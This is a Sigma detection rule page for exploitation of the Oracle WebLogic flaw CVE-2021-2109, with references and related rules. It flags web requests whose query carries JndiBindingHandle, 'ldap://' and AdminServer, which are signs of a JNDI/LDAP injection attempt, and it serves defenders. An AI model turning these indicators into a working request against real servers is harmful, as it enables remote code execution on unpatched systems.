Oracle WebLogic Exploit CVE-2021-2109

 1title: Oracle WebLogic Exploit CVE-2021-2109
 2id: 687f6504-7f44-4549-91fc-f07bab065821
 3status: test
 4description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
 5references:
 6    - https://twitter.com/pyn3rd/status/1351696768065409026
 7    - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
 8author: Bhabesh Raj
 9date: 2021/01/20
10modified: 2023/01/02
11tags:
12    - attack.t1190
13    - attack.initial_access
14    - cve.2021.2109
15    - detection.emerging_threats
16logsource:
17    category: webserver
18detection:
19    selection:
20        cs-method: 'GET'
21        cs-uri-query|contains|all:
22            - 'com.bea.console.handles.JndiBindingHandle'
23            - 'ldap://'
24            - 'AdminServer'
25    condition: selection
26fields:
27    - c-ip
28    - c-dns
29falsepositives:
30    - Unknown
31level: critical

References

• Something went wrong, but don’t fret — let’s give it another shot.

  
  Read More

• 阿里云安全获Oracle官方致谢 ｜Weblogic Server远程代码执行漏洞预警(CVE-2021-2109)

  

  2020年12月20日，阿里云安全团队向Oracle官方报告了Weblogic Server远程代码执行漏洞，漏洞编号为CVE-2021-2109

  
  Read More

Related rules

• CVE-2010-5278 Exploitation Attempt
• CVE-2020-0688 Exchange Exploitation via Web Log
• CVE-2020-0688 Exploitation Attempt
• CVE-2020-10148 SolarWinds Orion API Auth Bypass
• CVE-2020-5902 F5 BIG-IP Exploitation Attempt